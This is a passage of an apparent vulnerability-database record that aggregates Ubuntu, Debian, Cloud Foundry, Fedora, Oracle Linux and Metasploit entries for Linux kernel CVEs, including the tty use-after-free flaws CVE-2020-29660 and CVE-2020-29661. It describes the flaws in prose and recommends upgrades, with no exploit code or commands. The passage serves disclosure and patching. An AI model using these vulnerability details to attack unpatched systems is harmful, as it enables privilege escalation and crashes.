guest VM could use this to cause a denial \nof service in the host OS. (CVE-2020-29569)\n\nJann Horn discovered that the tty subsystem of the Linux kernel did not use \nconsistent locking in some situations, leading to a read-after-free \nvulnerability. A local attacker could use this to cause a denial of service \n(system crash) or possibly expose sensitive information (kernel memory). \n(CVE-2020-29660)\n\nJann Horn discovered a race condition in the tty subsystem of the Linux \nkernel in the locking for the TIOCSPGRP ioctl(), leading to a use-after- \nfree vulnerability. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code. (CVE-2020-29661)", "edition": 2, "modified": "2021-02-25T00:00:00", "published": "2021-02-25T00:00:00", "id": "USN-4749-1", "href": "https://ubuntu.com/security/notices/USN-4749-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-25T12:00:44", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28588", "CVE-2020-27830", "CVE-2020-27815", "CVE-2020-25669", "CVE-2020-28941", "CVE-2020-29569", "CVE-2020-29568", "CVE-2021-20177", "CVE-2020-29661", "CVE-2020-29660"], "description": "Bodong Zhao discovered a use-after-free in the Sun keyboard driver \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service or possibly execute arbitrary code. \n(CVE-2020-25669)\n\nIt was discovered that the jfs file system implementation in the Linux \nkernel contained an out-of-bounds read vulnerability. A local attacker \ncould use this to possibly cause a denial of service (system crash). \n(CVE-2020-27815)\n\nShisong Qin and Bodong Zhao discovered that Speakup screen reader driver in \nthe Linux kernel did not correctly handle setting line discipline in some \nsituations. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2020-27830, CVE-2020-28941)\n\nIt was discovered that an information leak existed in the syscall \nimplementation in the Linux kernel on 32 bit systems. A local attacker \ncould use this to expose sensitive information (kernel memory). \n(CVE-2020-28588)\n\nMichael Kurth and Pawel Wieczorkiewicz discovered that the Xen event \nprocessing backend in the Linux kernel did not properly limit the number of \nevents queued. An attacker in a guest VM could use this to cause a denial \nof service in the host OS. (CVE-2020-29568)\n\nOlivier Benjamin and Pawel Wieczorkiewicz discovered a race condition the \nXen paravirt block backend in the Linux kernel, leading to a use-after-free \nvulnerability. An attacker in a guest VM could use this to cause a denial \nof service in the host OS. (CVE-2020-29569)\n\nJann Horn discovered that the tty subsystem of the Linux kernel did not use \nconsistent locking in some situations, leading to a read-after-free \nvulnerability. A local attacker could use this to cause a denial of service \n(system crash) or possibly expose sensitive information (kernel memory). \n(CVE-2020-29660)\n\nJann Horn discovered a race condition in the tty subsystem of the Linux \nkernel in the locking for the TIOCSPGRP ioctl(), leading to a use-after- \nfree vulnerability. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code. (CVE-2020-29661)\n\nIt was discovered that the netfilter subsystem in the Linux kernel did not \nproperly handle filter rules in some situations. A local attacker with the \nCAP_NET_ADMIN capability could use this to cause a denial of service. \n(CVE-2021-20177)", "edition": 1, "modified": "2021-02-25T00:00:00", "published": "2021-02-25T00:00:00", "id": "USN-4750-1", "href": "https://ubuntu.com/security/notices/USN-4750-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-28T12:13:27", "bulletinFamily": "unix", "cvelist": ["CVE-2019-19816", "CVE-2018-13093", "CVE-2020-25669", "CVE-2019-19813", "CVE-2020-27777"], "description": "Wen Xu discovered that the XFS filesystem implementation in the Linux \nkernel did not properly track inode validations. An attacker could use this \nto construct a malicious XFS image that, when mounted, could cause a denial \nof service (system crash). (CVE-2018-13093)\n\nIt was discovered that the btrfs file system implementation in the Linux \nkernel did not properly validate file system metadata in some situations. \nAn attacker could use this to construct a malicious btrfs image that, when \nmounted, could cause a denial of service (system crash). (CVE-2019-19813, \nCVE-2019-19816)\n\nBodong Zhao discovered a use-after-free in the Sun keyboard driver \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service or possibly execute arbitrary code. \n(CVE-2020-25669)\n\nDaniel Axtens discovered that PowerPC RTAS implementation in the Linux \nkernel did not properly restrict memory accesses in some situations. A \nprivileged local attacker could use this to arbitrarily modify kernel \nmemory, potentially bypassing kernel lockdown restrictions. \n(CVE-2020-27777)", "edition": 1, "modified": "2021-01-28T00:00:00", "published": "2021-01-28T00:00:00", "id": "USN-4708-1", "href": "https://ubuntu.com/security/notices/USN-4708-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-03T00:01:45", "bulletinFamily": "unix", "cvelist": ["CVE-2019-19816", "CVE-2018-13093", "CVE-2020-25669", "CVE-2019-19813", "CVE-2020-28374"], "description": "It was discovered that the LIO SCSI target implementation in the Linux \nkernel performed insufficient identifier checking in certain XCOPY \nrequests. An attacker with access to at least one LUN in a multiple \nbackstore environment could use this to expose sensitive information or \nmodify data. (CVE-2020-28374)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux \nkernel did not properly track inode validations. An attacker could use this \nto construct a malicious XFS image that, when mounted, could cause a denial \nof service (system crash). (CVE-2018-13093)\n\nIt was discovered that the btrfs file system implementation in the Linux \nkernel did not properly validate file system metadata in some situations. \nAn attacker could use this to construct a malicious btrfs image that, when \nmounted, could cause a denial of service (system crash). (CVE-2019-19813, \nCVE-2019-19816)\n\nBodong Zhao discovered a use-after-free in the Sun keyboard driver \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service or possibly execute arbitrary code. \n(CVE-2020-25669)", "edition": 2, "modified": "2021-02-02T00:00:00", "published": "2021-02-02T00:00:00", "id": "USN-4709-1", "href": "https://ubuntu.com/security/notices/USN-4709-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-25T12:02:36", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28588", "CVE-2020-27675", "CVE-2020-27830", "CVE-2020-35508", "CVE-2020-27815", "CVE-2020-27835", "CVE-2020-25669", "CVE-2020-27777", "CVE-2020-28941", "CVE-2020-29569", "CVE-2020-25656", "CVE-2020-27673", "CVE-2020-29568", "CVE-2020-25668", "CVE-2020-29661", "CVE-2020-28974", "CVE-2020-25704", "CVE-2020-29660"], "description": "It was discovered that the console keyboard driver in the Linux kernel \ncontained a race condition. A local attacker could use this to expose \nsensitive information (kernel memory). (CVE-2020-25656)\n\nMinh Yuan discovered that the tty driver in the Linux kernel contained race \nconditions when handling fonts. A local attacker could possibly use this to \nexpose sensitive information (kernel memory). (CVE-2020-25668)\n\nBodong Zhao discovered a use-after-free in the Sun keyboard driver \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service or possibly execute arbitrary code. \n(CVE-2020-25669)\n\nKiyin (\u5c39\u4eae) discovered that the perf subsystem in the Linux kernel did \nnot properly deallocate memory in some situations. A privileged attacker \ncould use this to cause a denial of service (kernel memory exhaustion). \n(CVE-2020-25704)\n\nJulien Grall discovered that the Xen dom0 event handler in the Linux kernel \ndid not properly limit the number of events queued. An attacker in a guest \nVM could use this to cause a denial of service in the host OS. \n(CVE-2020-27673)\n\nJinoh Kang discovered that the Xen event channel infrastructure in the \nLinux kernel contained a race condition. An attacker in guest could \npossibly use this to cause a denial of service (dom0 crash). \n(CVE-2020-27675)\n\nDaniel Axtens discovered that PowerPC RTAS implementation in the Linux \nkernel did not properly restrict memory accesses in some situations. A \nprivileged local attacker could use this to arbitrarily modify kernel \nmemory, potentially bypassing kernel lockdown restrictions. \n(CVE-2020-27777)\n\nIt was discovered that the jfs file system implementation in the Linux \nkernel contained an out-of-bounds read vulnerability. A local attacker \ncould use this to possibly cause a denial of service (system crash). \n(CVE-2020-27815)\n\nShisong Qin and Bodong Zhao discovered that Speakup screen reader driver in \nthe Linux kernel did not correctly handle setting line discipline in some \nsituations. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2020-27830, CVE-2020-28941)\n\nIt was discovered that a use-after-free vulnerability existed in the \ninfiniband hfi1 device driver in the Linux kernel. A local attacker could \npossibly use this to cause a denial of service (system crash). \n(CVE-2020-27835)\n\nIt was discovered that an information leak existed in the syscall \nimplementation in the Linux kernel on 32 bit systems. A local attacker \ncould use this to expose sensitive information (kernel memory). \n(CVE-2020-28588)\n\nMinh Yuan discovered that the framebuffer console driver in the Linux \nkernel did not properly handle fonts in some conditions. A local attacker \ncould use this to cause a denial of service (system crash) or possibly \nexpose sensitive information (kernel memory). (CVE-2020-28974)\n\nMichael Kurth and Pawel Wieczorkiewicz discovered that the Xen event \nprocessing backend in the Linux kernel did not properly limit the number of \nevents queued. An attacker in a guest VM could use this to cause a denial \nof service in the host OS. (CVE-2020-29568)\n\nOlivier Benjamin and Pawel Wieczorkiewicz discovered a race condition the \nXen paravirt block backend in the Linux kernel, leading to a use-after-free \nvulnerability. An attacker in a guest VM could use this to cause a denial \nof service in the host OS. (CVE-2020-29569)\n\nJann Horn discovered that the tty subsystem of the Linux kernel did not use \nconsistent locking in some situations, leading to a read-after-free \nvulnerability. A local attacker could use this to cause a denial of service \n(system crash) or possibly expose sensitive information (kernel memory). \n(CVE-2020-29660)\n\nJann Horn discovered a race condition in the tty subsystem of the Linux \nkernel in the locking for the TIOCSPGRP ioctl(), leading to a use-after- \nfree vulnerability. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code. (CVE-2020-29661)\n\nIt was discovered that a race condition existed that caused the Linux \nkernel to not properly restrict exit signal delivery. A local attacker \ncould possibly use this to send signals to arbitrary processes. \n(CVE-2020-35508)", "edition": 1, "modified": "2021-02-25T00:00:00", "published": "2021-02-25T00:00:00", "id": "USN-4751-1", "href": "https://ubuntu.com/security/notices/USN-4751-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2021-06-04T04:48:49", "description": "\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Huawei EulerOS: CVE-2020-29660: kernel security update", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-29660"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-29660/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-06-04T04:48:49", "description": "\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Huawei EulerOS: CVE-2020-29661: kernel security update", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-29661"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2020-29661/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2021-03-02T05:29:47", "bulletinFamily": "software", "cvelist": ["CVE-2020-27830", "CVE-2020-27815", "CVE-2020-25669", "CVE-2020-28941", "CVE-2020-29569", "CVE-2020-29374", "CVE-2020-29568", "CVE-2020-29661", "CVE-2020-29660"], "description": "## Severity\n\nMedium\n\n## Vendor\n\nCanonical Ubuntu\n\n## Versions Affected\n\n * Canonical Ubuntu 16.04\n\n## Description\n\nBodong Zhao discovered a use-after-free in the Sun keyboard driver implementation in the Linux kernel. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2020-25669)\n\nIt was discovered that the jfs file system implementation in the Linux kernel contained an out-of-bounds read vulnerability. A local attacker could use this to possibly cause a denial of service (system crash). (CVE-2020-27815)\n\nShisong Qin and Bodong Zhao discovered that Speakup screen reader driver in the Linux kernel did not correctly handle setting line discipline in some situations. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-27830, CVE-2020-28941)\n\nIt was discovered that the memory management subsystem in the Linux kernel did not properly handle copy-on-write operations in some situations. A local attacker could possibly use this to gain unintended write access to read-only memory pages. (CVE-2020-29374)\n\nMichael Kurth and Pawel Wieczorkiewicz discovered that the Xen event processing backend in the Linux kernel did not properly limit the number of events queued. An attacker in a guest VM could use this to cause a denial of service in the host OS. (CVE-2020-29568)\n\nOlivier Benjamin and Pawel Wieczorkiewicz discovered a race condition the Xen paravirt block backend in the Linux kernel, leading to a use-after-free vulnerability. An attacker in a guest VM could use this to cause a denial of service in the host OS. (CVE-2020-29569)\n\nJann Horn discovered that the tty subsystem of the Linux kernel did not use consistent locking in some situations, leading to a read-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information (kernel memory). (CVE-2020-29660)\n\nJann Horn discovered a race condition in the tty subsystem of the Linux kernel in the locking for the TIOCSPGRP ioctl(), leading to a use-after- free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-29661)\n\nCVEs contained in this USN include: CVE-2020-25669, CVE-2020-27815, CVE-2020-29660, CVE-2020-27830, CVE-2020-29568, CVE-2020-29374, CVE-2020-29569, CVE-2020-29661, CVE-2020-28941.\n\n## Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Xenial Stemcells \n * 456.x versions prior to 456.145\n * 621.x versions prior to 621.108\n * All other stemcells not listed.\n\n## Mitigation\n\nUsers of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading the following releases:\n\n * Xenial Stemcells \n * Upgrade 456.x versions to 456.145 or greater\n * Upgrade 621.x versions to 621.108 or greater\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells>).\n\n## References\n\n * [USN Notice](<https://usn.ubuntu.com/4749-1/>)\n * [CVE-2020-25669](<https://people.canonical.com/~ubuntu-security/cve/CVE-2020-25669>)\n * [CVE-2020-27815](<https://people.canonical.com/~ubuntu-security/cve/CVE-2020-27815>)\n * [CVE-2020-29660](<https://people.canonical.com/~ubuntu-security/cve/CVE-2020-29660>)\n * [CVE-2020-27830](<https://people.canonical.com/~ubuntu-security/cve/CVE-2020-27830>)\n * [CVE-2020-29568](<https://people.canonical.com/~ubuntu-security/cve/CVE-2020-29568>)\n * [CVE-2020-29374](<https://people.canonical.com/~ubuntu-security/cve/CVE-2020-29374>)\n * [CVE-2020-29569](<https://people.canonical.com/~ubuntu-security/cve/CVE-2020-29569>)\n * [CVE-2020-29661](<https://people.canonical.com/~ubuntu-security/cve/CVE-2020-29661>)\n * [CVE-2020-28941](<https://people.canonical.com/~ubuntu-security/cve/CVE-2020-28941>)\n\n## History\n\n2021-03-01: Initial vulnerability report published.\n", "edition": 1, "modified": "2021-03-01T00:00:00", "published": "2021-03-01T00:00:00", "id": "CFOUNDRY:6842286EED83D27526CFF6743C20F98E", "href": "https://www.cloudfoundry.org/blog/usn-4749-1/", "title": "USN-4749-1: Linux kernel vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-07-20T22:21:44", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3347", "CVE-2020-27830", "CVE-2020-27825", "CVE-2020-27815", "CVE-2020-29569", "CVE-2020-36158", "CVE-2020-29568", "CVE-2021-20177", "CVE-2020-29661", "CVE-2020-28374", "CVE-2020-29660"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4843-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nFebruary 01, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2020-27815 CVE-2020-27825 CVE-2020-27830 CVE-2020-28374\n CVE-2020-29568 CVE-2020-29569 CVE-2020-29660 CVE-2020-29661\n CVE-2020-36158 CVE-2021-3347 CVE-2021-20177\nDebian Bug : 970736 972345 977048 977615\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2020-27815\n\n A flaw was reported in the JFS filesystem code allowing a local\n attacker with the ability to set extended attributes to cause a\n denial of service.\n\nCVE-2020-27825\n\n Adam 'pi3' Zabrocki reported a use-after-free flaw in the ftrace\n ring buffer resizing logic due to a race condition, which could\n result in denial of service or information leak.\n\nCVE-2020-27830\n\n Shisong Qin reported a NULL pointer dereference flaw in the Speakup\n screen reader core driver.\n\nCVE-2020-28374\n\n David Disseldorp discovered that the LIO SCSI target implementation\n performed insufficient checking in certain XCOPY requests. An\n attacker with access to a LUN and knowledge of Unit Serial Number\n assignments can take advantage of this flaw to read and write to any\n LIO backstore, regardless of the SCSI transport settings.\n\nCVE-2020-29568 (XSA-349)\n\n Michael Kurth and Pawel Wieczorkiewicz reported that frontends can\n trigger OOM in backends by updating a watched path.\n\nCVE-2020-29569 (XSA-350)\n\n Olivier Benjamin and Pawel Wieczorkiewicz reported a use-after-free\n flaw which can be triggered by a block frontend in Linux blkback. A\n misbehaving guest can trigger a dom0 crash by continuously\n connecting / disconnecting a block frontend.\n\nCVE-2020-29660\n\n Jann Horn reported a locking inconsistency issue in the tty\n subsystem which may allow a local attacker to mount a\n read-after-free attack against TIOCGSID.\n\nCVE-2020-29661\n\n Jann Horn reported a locking issue in the tty subsystem which can\n result in a use-after-free. A local attacker can take advantage of\n this flaw for memory corruption or privilege escalation.\n\nCVE-2020-36158\n\n A buffer overflow flaw was discovered in the mwifiex WiFi driver\n which could result in denial of service or the execution of\n arbitrary code via a long SSID value.\n\nCVE-2021-3347\n\n It was discovered that PI futexes have a kernel stack use-after-free\n during fault handling. An unprivileged user could use this flaw to\n crash the kernel (resulting in denial of service) or for privilege\n escalation.\n\nCVE-2021-20177\n\n A flaw was discovered in the Linux implementation of string matching\n within a packet. A privileged user (with root or CAP_NET_ADMIN) can\n take advantage of this flaw to cause a kernel panic when inserting\n iptables rules.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.19.171-2.\n\nWe recommend that you upgrade your linux packages.\n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2021-02-01T14:39:59", "published": "2021-02-01T14:39:59", "id": "DEBIAN:DSA-4843-1:3B37B", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00024.html", "title": "[SECURITY] [DSA 4843-1] linux security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-23T10:28:52", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3347", "CVE-2020-27830", "CVE-2020-27825", "CVE-2020-27815", "CVE-2020-29569", "CVE-2020-36158", "CVE-2020-29568", "CVE-2021-20177", "CVE-2020-29661", "CVE-2020-28374", "CVE-2020-29660"], "description": "-------------------------------------------------------------------------\nDebian LTS Advisory DLA-2557-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Ben Hutchings\nFebruary 12, 2021 https://wiki.debian.org/LTS\n-------------------------------------------------------------------------\n\nPackage : linux-4.19\nVersion : 4.19.171-2~deb9u1\nCVE ID : CVE-2020-27815 CVE-2020-27825 CVE-2020-27830 CVE-2020-28374 \n CVE-2020-29568 CVE-2020-29569 CVE-2020-29660 CVE-2020-29661 \n CVE-2020-36158 CVE-2021-3347 CVE-2021-20177\nDebian Bug : 970736 972345 977048 977615\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2020-27815\n\n A flaw was reported in the JFS filesystem code allowing a local\n attacker with the ability to set extended attributes to cause a\n denial of service.\n\nCVE-2020-27825\n\n Adam 'pi3' Zabrocki reported a use-after-free flaw in the ftrace\n ring buffer resizing logic due to a race condition, which could\n result in denial of service or information leak.\n\nCVE-2020-27830\n\n Shisong Qin reported a NULL pointer dereference flaw in the Speakup\n screen reader core driver.\n\nCVE-2020-28374\n\n David Disseldorp discovered that the LIO SCSI target implementation\n performed insufficient checking in certain XCOPY requests. An\n attacker with access to a LUN and knowledge of Unit Serial Number\n assignments can take advantage of this flaw to read and write to any\n LIO backstore, regardless of the SCSI transport settings.\n\nCVE-2020-29568 (XSA-349)\n\n Michael Kurth and Pawel Wieczorkiewicz reported that frontends can\n trigger OOM in backends by updating a watched path.\n\nCVE-2020-29569 (XSA-350)\n\n Olivier Benjamin and Pawel Wieczorkiewicz reported a use-after-free\n flaw which can be triggered by a block frontend in Linux blkback. A\n misbehaving guest can trigger a dom0 crash by continuously\n connecting / disconnecting a block frontend.\n\nCVE-2020-29660\n\n Jann Horn reported a locking inconsistency issue in the tty\n subsystem which may allow a local attacker to mount a\n read-after-free attack against TIOCGSID.\n\nCVE-2020-29661\n\n Jann Horn reported a locking issue in the tty subsystem which can\n result in a use-after-free. A local attacker can take advantage of\n this flaw for memory corruption or privilege escalation.\n\nCVE-2020-36158\n\n A buffer overflow flaw was discovered in the mwifiex WiFi driver\n which could result in denial of service or the execution of\n arbitrary code via a long SSID value.\n\nCVE-2021-3347\n\n It was discovered that PI futexes have a kernel stack use-after-free\n during fault handling. An unprivileged user could use this flaw to\n crash the kernel (resulting in denial of service) or for privilege\n escalation.\n\nCVE-2021-20177\n\n A flaw was discovered in the Linux implementation of string matching\n within a packet. A privileged user (with root or CAP_NET_ADMIN) can\n take advantage of this flaw to cause a kernel panic when inserting\n iptables rules.\n\nFor Debian 9 stretch, these problems have been fixed in version\n4.19.171-2~deb9u1.\n\nWe recommend that you upgrade your linux-4.19 packages.\n\nFor the detailed security status of linux-4.19 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/linux-4.19\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings\nReality is just a crutch for people who can't handle science fiction.\n", "edition": 6, "modified": "2021-02-12T19:25:50", "published": "2021-02-12T19:25:50", "id": "DEBIAN:DLA-2557-1:3E233", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202102/msg00018.html", "title": "[SECURITY] [DLA 2557-1] linux-4.19 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-28T22:30:42", "bulletinFamily": "unix", "cvelist": ["CVE-2019-19318", "CVE-2021-27365", "CVE-2021-3347", "CVE-2019-19816", "CVE-2021-27364", "CVE-2021-26932", "CVE-2020-27825", "CVE-2020-27815", "CVE-2019-19813", "CVE-2021-27363", "CVE-2020-29569", "CVE-2021-26930", "CVE-2021-26931", "CVE-2020-36158", "CVE-2021-28038", "CVE-2020-29568", "CVE-2020-29661", "CVE-2020-28374", "CVE-2020-29660", "CVE-2021-3178"], "description": "-------------------------------------------------------------------------\nDebian LTS Advisory DLA-2586-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Ben Hutchings\nMarch 08, 2021 https://wiki.debian.org/LTS\n-------------------------------------------------------------------------\n\nPackage : linux\nVersion : 4.9.258-1\nCVE ID : CVE-2019-19318 CVE-2019-19813 CVE-2019-19816 CVE-2020-27815 \n CVE-2020-27825 CVE-2020-28374 CVE-2020-29568 CVE-2020-29569 \n CVE-2020-29660 CVE-2020-29661 CVE-2020-36158 CVE-2021-3178 \n CVE-2021-3347 CVE-2021-26930 CVE-2021-26931 CVE-2021-26932 \n CVE-2021-27363 CVE-2021-27364 CVE-2021-27365 CVE-2021-28038\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2019-19318, CVE-2019-19813, CVE-2019-19816\n\n "Team bobfuzzer" reported bugs in Btrfs that could lead to a\n use-after-free or heap buffer overflow, and could be triggered by\n crafted filesystem images. A user permitted to mount and access\n arbitrary filesystems could use these to cause a denial of service\n (crash or memory corruption) or possibly for privilege escalation.\n\nCVE-2020-27815\n\n A flaw was reported in the JFS filesystem code allowing a local\n attacker with the ability to set extended attributes to cause a\n denial of service.\n\nCVE-2020-27825\n\n Adam 'pi3' Zabrocki reported a use-after-free flaw in the ftrace\n ring buffer resizing logic due to a race condition, which could\n result in denial of service or information leak.\n\nCVE-2020-28374\n\n David Disseldorp discovered that the LIO SCSI target implementation\n performed insufficient checking in certain XCOPY requests. An\n attacker with access to a LUN and knowledge of Unit Serial Number\n assignments can take advantage of this flaw to read and write to any\n LIO backstore, regardless of the SCSI transport settings.\n\nCVE-2020-29568 (XSA-349)\n\n Michael Kurth and Pawel Wieczorkiewicz reported that frontends can\n trigger OOM in backends by updating a watched path.\n\nCVE-2020-29569 (XSA-350)\n\n Olivier Benjamin and Pawel Wieczorkiewicz reported a use-after-free\n flaw which can be triggered by a block frontend in Linux blkback. A\n misbehaving guest can trigger a dom0 crash by continuously\n connecting / disconnecting a block frontend.\n\nCVE-2020-29660\n\n Jann Horn reported a locking inconsistency issue in the tty\n subsystem which may allow a local attacker to mount a\n read-after-free attack against TIOCGSID.\n\nCVE-2020-29661\n\n Jann Horn reported a locking issue in the tty subsystem which can\n result in a use-after-free. A local attacker can take advantage of\n this flaw for memory corruption or privilege escalation.\n\nCVE-2020-36158\n\n A buffer overflow flaw was discovered in the mwifiex WiFi driver\n which could result in denial of service or the execution of\n arbitrary code via a long SSID value.\n\nCVE-2021-3178\n\n \u5434\u5f02 reported an information leak in the NFSv3 server. When only\n a subdirectory of a filesystem volume is exported, an NFS client\n listing the exported directory would obtain a file handle to the\n parent directory, allowing it to access files that were not meant\n to be exported.\n\n Even after this update, it is still possible for NFSv3 clients to\n guess valid file handles and access files outside an exported\n subdirectory, unless the "subtree_check" export option is enabled.\n It is recommended that you do not use that option but only export\n whole filesystem volumes.\n\nCVE-2021-3347\n\n It was discovered that PI futexes have a kernel stack use-after-free\n during fault handling. An unprivileged user could use this flaw to\n crash the kernel (resulting in denial of service) or for privilege\n escalation.\n\nCVE-2021-26930 (XSA-365)\n\n Olivier Benjamin, Norbert Manthey, Martin Mazein, and Jan\n H. Sch\u00f6nherr discovered that the Xen block backend driver\n (xen-blkback) did not handle grant mapping errors correctly. A\n malicious guest could exploit this bug to cause a denial of\n service (crash), or possibly an information leak or privilege\n escalation, within the domain running the backend, which is\n typically dom0.\n\nCVE-2021-26931 (XSA-362), CVE-2021-26932 (XSA-361), CVE-2021-28038 (XSA-367)\n\n Jan Beulich discovered that the Xen support code and various Xen\n backend drivers did not handle grant mapping errors correctly. A\n malicious guest could exploit these bugs to cause a denial of\n service (crash) within the domain running the backend, which is\n typically dom0.\n\nCVE-2021-27363\n\n Adam Nichols reported that the iSCSI initiator subsystem did not\n properly restrict access to transport handle attributes in sysfs.\n On a system acting as an iSCSI initiator, this is an information\n leak to local users and makes it easier to exploit CVE-2021-27364.\n\nCVE-2021-27364\n\n Adam Nichols reported that the iSCSI initiator subsystem did not\n properly restrict access to its netlink management interface. On\n a system acting as an iSCSI initiator, a local user could use\n these to cause a denial of service (disconnection of storage) or\n possibly for privilege escalation.\n\nCVE-2021-27365\n\n Adam Nichols reported that the iSCSI initiator subsystem did not\n correctly limit the lengths of parameters or "passthrough PDUs"\n sent through its netlink management interface. On a system acting\n as an iSCSI initiator, a local user could use these to leak the\n contents of kernel memory, to cause a denial of service (kernel\n memory corruption or crash), and probably for privilege\n escalation.\n\nFor Debian 9 stretch, these problems have been fixed in version\n4.9.258-1.\n\nWe recommend that you upgrade your linux packages.\n\nFor the detailed security status of linux please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 6, "modified": "2021-03-09T18:08:28", "published": "2021-03-09T18:08:28", "id": "DEBIAN:DLA-2586-1:6B2FD", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202103/msg00010.html", "title": "[SECURITY] [DLA 2586-1] linux security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:56", "bulletinFamily": "unix", "cvelist": ["CVE-2020-29660", "CVE-2020-29661"], "description": "The kernel meta package ", "modified": "2020-12-17T01:24:41", "published": "2020-12-17T01:24:41", "id": "FEDORA:1F1BC30987DA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: kernel-5.9.14-100.fc32", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:56", "bulletinFamily": "unix", "cvelist": ["CVE-2020-29660", "CVE-2020-29661"], "description": "The kernel meta package ", "modified": "2020-12-17T01:25:30", "published": "2020-12-17T01:25:30", "id": "FEDORA:824E230A6A04", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: kernel-5.9.14-200.fc33", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2021-06-04T20:21:13", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28374", "CVE-2020-29568", "CVE-2020-29569", "CVE-2020-29660", "CVE-2020-36158", "CVE-2021-20177"], "description": "[5.4.17-2036.103.3.el7]\n- Revert 'rds: Deregister all FRWR mr with free_mr' (aru kolappan) [Orabug:\n 32426610]\n[5.4.17-2036.103.2.el7]\n- A/A Bonding: Fix a 